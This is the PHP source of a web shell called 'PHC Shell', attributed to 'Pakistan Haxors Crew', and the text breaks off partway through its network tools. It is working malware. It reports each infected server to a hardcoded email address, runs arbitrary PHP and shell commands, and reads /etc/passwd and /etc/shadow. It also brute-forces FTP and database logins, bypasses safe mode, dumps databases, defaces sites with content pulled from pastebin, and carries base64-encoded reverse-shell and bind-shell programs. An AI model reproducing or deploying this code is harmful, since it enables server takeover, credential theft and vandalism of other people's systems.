Saturday, Apr 29, 2017

}

echo '

'.
'

'.
'


Pakistan Haxors
Crew

Uname : '.substr(@php_uname(), 0, 120).'
User : '.$uid.' ( '.$user.' ) Group: '.$gid.' ( '.$group.' )
Server : '.@getenv('SERVER_SOFTWARE').'
Useful : '.$usefl.'
Downloaders : '.$dwnldr.'
Disabled functions : '.($disable_functions?$disable_functions:'All Function Enable').'
'.($GLOBALS['os'] == 'win'?'Drives
Cwd':'Cwd').'
: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
Server IP
Client IP
HDD
Free
PHP
Safe Mode
Domains
: '.gethostbyname($_SERVER["HTTP_HOST"]).'
: '.$_SERVER['REMOTE_ADDR'].'
: '.viewSize($totalSpace).'
: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)
: '.@phpversion().' [ phpinfo ]
: '.($GLOBALS['safe_mode']?'ON':'
Read file:
Make dir:
'.$is_writable.'
Make file:
'.$is_writable.'
Execute:

Upload file:
'.$is_writable.'

PHC Shell '.VERSION.', © Pakistan Haxors Crew. Coded By - H4$N4!N H4XOR

';
}

if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }

if(!isset($_SESSION['trimite'])){
$url="IP: ".gethostbyname($_SERVER["HTTP_HOST"])."\nUrl: ".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."\nUser IP: ".$_SERVER['REMOTE_ADDR'].(isset($_SERVER['HTTP_X_FORWARDED_FOR'])?'('.$_SERVER['HTTP_X_FORWARDED_FOR'].')':'');
@mail("1337shells@gmail.com","PHC_Shell_2.0",$url);
$_SESSION['trimite']=true;
}

function viewSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}

function perms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}

function viewPermsColor($f) {
if (!@is_readable($f))
return ''.perms(@fileperms($f)).'';
elseif (!@is_writable($f))
return ''.perms(@fileperms($f)).'';
else
return ''.perms(@fileperms($f)).'';
}

if(!function_exists("scandir")) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}

function actionSecInfo() {
printHeader();
echo '

Server security information

';
function showSecParam($n, $v) {
$v = trim($v);
if($v) {
echo ''.$n.': ';
if(strpos($v, "\n") === false)
echo $v.'
';
else
echo ''.$v.'';
}
}

showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
showSecParam('Supported databases', implode(', ', $temp));
echo '
';

if( $GLOBALS['os'] == 'nix' ) {
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no');
showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no');
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if(!$GLOBALS['safe_mode']) {
echo '
';
$temp=array();
foreach ($userful as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Userful', implode(', ',$temp));
$temp=array();
foreach ($danger as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Danger', implode(', ',$temp));
$temp=array();
foreach ($downloaders as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Downloaders', implode(', ',$temp));
echo '
';
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('HDD space', ex('df -h'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version',ex('ver'));
showSecParam('Account Settings',ex('net accounts'));
showSecParam('User Accounts',ex('net user'));
}
echo '

';
printFooter();
}

function actionPhp() {
if( isset($_POST['ajax']) ) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
eval($_POST['p1']);
$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
echo '

PHP info

';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!body {.*}!msiU','',$tmp);
$tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
$tmp = preg_replace('!h1!msiU','h2',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
echo $tmp;
echo '


';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '

Execution PHP-code

'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'';
echo ' send using AJAX';
if(!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo '

';
printFooter();
}

function actionFilesMan() {
printHeader();
echo '

File manager

';
if(isset($_POST['p1']) && $_POST['p1']!='deface') {
switch($_POST['p1']) {
case 'uploadFile':
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
echo "Can't upload file!";
break;
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == "..") || (basename($item) == ".") )
continue;
$type = filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f) {
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_SESSION['act'] == 'copy') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f, $d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
} elseif($_SESSION['act'] == 'move') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f, $d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
$_SESSION['act'] = @$_POST['p1'];
$_SESSION['f'] = @$_POST['f'];
foreach($_SESSION['f'] as $k => $f)
$_SESSION['f'][$k] = urldecode($f);
$_SESSION['cwd'] = @$_POST['c'];
}
break;
}
echo 'document.mf.p1.value="";document.mf.p2.value="";';
}
if(isset($_POST['p1']) && $_POST['p1']=='deface') {
$def = file_get_contents('http://pastebin.com/download.php?i=F60iTJTf');
file_put_contents($_POST['c'].$_POST['p2'],$def);
}
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
global $sort;
$sort = array('name', 1);
if(!empty($_POST['p1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo '
function sa() {
for(i=0;i>">  

';
printFooter();
}

function actionStringTools() {
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'bin2hex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo "";
foreach($stringTools as $k => $v)
echo "".$k."";
echo " send using AJAX
".htmlspecialchars(@$_POST['p2'])."";
if(!empty($_POST['p1'])) {
if(function_exists($_POST['p1']))
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo"

";
printFooter();
}

function actionFilesTools() {
if( isset($_POST['p1']) )
$_POST['p1'] = urldecode($_POST['p1']);
if(@$_POST['p2']=='download') {
if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: ".$type);
}
$fp = @fopen($_POST['p1'], "r");
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);
fclose($fp);
}
} elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {

}
exit;
}
if( @$_POST['p2'] == 'mkfile' ) {
if(!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
printHeader();
echo '

File tools

';
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
$gid = @posix_getgrgid(@fileowner($_POST['p1']));
echo 'Name: '.htmlspecialchars($_POST['p1']).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';
echo '

';
switch($_POST['p2']) {
case 'view':
echo '';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '';
break;
case 'highlight':
if( is_readable($_POST['p1']) ) {
echo '
';
$code = highlight_file($_POST['p1'],true);
echo str_replace(array(' }br /
break;br /
case 'chmod':br /
if( !empty($_POST['p3']) ) {br /
$perms = 0;br /
for($i=strlen($_POST['p3'])-1;$i=0;--$i)br /
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));br /
if(!@chmod($_POST['p1'], $perms))br /
echo 'Can\'t set permissions!brscriptdocument.mf.p3.value="";/script';br /
elsebr /
die('scriptg(null,null,null,null,"")/script');br /
}br /
echo 'form onsubmit="g(null,null,null,null,this.chmod.value);return false;"input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"input type=submit value=""/form';br /
break;br /
case 'edit':br /
if( !is_writable($_POST['p1'])) {br /
echo 'File isn\'t writeable';br /
break;br /
}br /
if( !empty($_POST['p3']) ) {br /
@file_put_contents($_POST['p1'],$_POST['p3']);br /
echo 'Saved!brscriptdocument.mf.p3.value="";/script';br /
}br /
echo 'form onsubmit="g(null,null,null,null,this.text.value);return false;"textarea name=text class=bigarea';br /
$fp = @fopen($_POST['p1'], 'r');br /
if($fp) {br /
while( !@feof($fp) )br /
echo htmlspecialchars(@fread($fp, 1024));br /
@fclose($fp);br /
}br /
echo '/textareainput type=submit value="">';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000
','','');
$len = strlen($c);
for ($i=0; $i';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(@touch($_POST['p1'],$time,$time))
die('g(null,null,null,null,"")');
else {
echo 'Fail!document.mf.p3.value="";';
}
} else echo 'Bad time format!document.mf.p3.value="";';
}
echo '';
break;
case 'mkfile':

break;
}
echo '

';
printFooter();
}

function actionSafeMode() {
$temp='';
ob_start();
switch($_POST['p1']) {
case 1:
$temp=@tempnam($test, 'cx');
if(@copy("compress.zlib://".$_POST['p2'], $temp)){
echo @file_get_contents($temp);
unlink($temp);
} else
echo 'Sorry... Can\'t open file';
break;
case 2:
$files = glob($_POST['p2'].'*');
if( is_array($files) )
foreach ($files as $filename)
echo $filename."\n";
break;
case 3:
$ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST['p2']);
break;
case 5:
for(;$_POST['p2'] $v) {
if($v == '') {
echo '';
continue;
}
echo ''.$n.'';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo ' send using AJAX
';
if(!empty($_POST['p1'])) {
echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
}
echo '';
echo '

document.cf.cmd.focus();';
printFooter();
}

function actionLogout() {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo '';
}

function actionSelfRemove() {
printHeader();
if($_POST['p1'] == 'yes') {
if(@unlink(SELF_PATH))
die('Shell has been removed');
else
echo 'unlink error!';
}
echo '

Suicide

Really want to remove the shell?
Yes

';
printFooter();
}

function actionBruteforce() {
printHeader();
if( isset($_POST['proto']) ) {
echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
';
if( $_POST['proto'] == 'ftp' ) {
function bruteForce($ip,$port,$login,$pass) {
$fp = @ftp_connect($ip, $port?$port:21);
if(!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif( $_POST['proto'] == 'mysql' ) {
function bruteForce($ip,$port,$login,$pass) {
$res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
@mysql_close($res);
return $res;
}
} elseif( $_POST['proto'] == 'pgsql' ) {
function bruteForce($ip,$port,$login,$pass) {
$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
$res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if( is_array($temp) )
foreach($temp as $line) {
$line = explode(":", $line);
++$attempts;
if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
$success++;
echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
';
}
if(@$_POST['reverse']) {
$tmp = "";
for($i=strlen($line[0])-1; $i>=0; --$i)
$tmp .= $line[0][$i];
++$attempts;
if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
$success++;
echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp);
}
}
}
} elseif($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if( is_array($temp) )
foreach($temp as $line) {
$line = trim($line);
++$attempts;
if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
$success++;
echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
';
}
}
}
echo "Attempts: $attempts Success: $success


";
}
echo '

FTP bruteforce

'
.'

'
.'

'
.'

'
.'

'
.'

'
.'

'
.'

Type FTPMySqlPostgreSql
'
.''
.''
.''
.'Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary

'
.'

'
.'

'
.'

Login
Dictionary

'
.'

';
echo '


';
printFooter();
}

function actionSql() {
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type) {
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type) {
case 'mysql':
if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
break;
case 'pgsql':
$host = explode(':', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
break;
}
return false;
}
function selectdb($db) {
switch($this->type) {
case 'mysql':
if (@mysql_select_db($db))return true;
break;
}
return false;
}
function query($str) {
switch($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch() {
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type) {
case 'mysql':
return @mysql_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs() {
switch($this->type) {
case 'mysql':
return $this->res = @mysql_list_dbs($this->link);
break;
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database");
break;
}
return false;
}
function listTables() {
switch($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
break;
}
return false;
}
function error() {
switch($this->type) {
case 'mysql':
return @mysql_error($this->link);
break;
case 'pgsql':
return @pg_last_error($this->link);
break;
}
return false;
}
function setCharset($str) {
switch($this->type) {
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysql_set_charset($str, $this->link);
else
$this->query('SET CHARSET '.$str);
break;
case 'mysql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function dump($table) {
switch($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
$create = mysql_fetch_array($res);
echo $create[1].";\n\n";
$this->query('SELECT * FROM `'.$table.'`');
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "'".@mysql_real_escape_string($v)."'";
$columns[] = "`".$k."`";
}
echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
}
break;
case 'pgsql':
$this->query('SELECT * FROM '.$table);
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "'".addslashes($v)."'";
$columns[] = $k;
}
echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
}
break;
}
return false;
}
};
$db = new DbClass(@$_POST['type']);
if(@$_POST['p2']=='download') {
ob_start("ob_gzhandler", 4096);
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach($_POST['tbl'] as $v)
$db->dump($v);
exit;
}
printHeader();
echo '

Sql browser

Type Host Login Password Database

MySql
PostgreSql

';
$tmp = "";
if(isset($_POST['sql_host'])){
if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
switch($_POST['charset']) {
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
}
$db->listDbs();
echo "";
while($item = $db->fetch()) {
list($key, $value) = each($item);
echo ''.$value.'';
}
echo '';
}
else echo $tmp;
}else
echo $tmp;
echo '

function st(t,l) {
document.sf.p1.value = \'select\';
document.sf.p2.value = t;
if(l!=null)document.sf.p3.value = l;
document.sf.submit();
}
function is() {
for(i=0;i>'>";
if(@$_POST['p1'] == 'loadfile') {
$db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
$file = $db->fetch();
echo ''.htmlspecialchars($file['file']).'';
}
}
echo '

';
printFooter();
}

function actionNetwork() {
printHeader();
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";

echo '

Network tools

Bind port to /bin/sh

Port: Password: Using: CPerl

Back-connect to

Server: Port: Using: CPerl

';
if(isset($_POST['p1'])) {
function cf($f,$t) {
$w=@fopen($f,"w") or @function_exists('file_put_contents');
if($w) {
@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
@fclose($w);
}
}
if($_POST['p1'] == 'bpc') {
cf("/tmp/bp.c",$bind_port_c);
$out = ex("gcc -o /tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
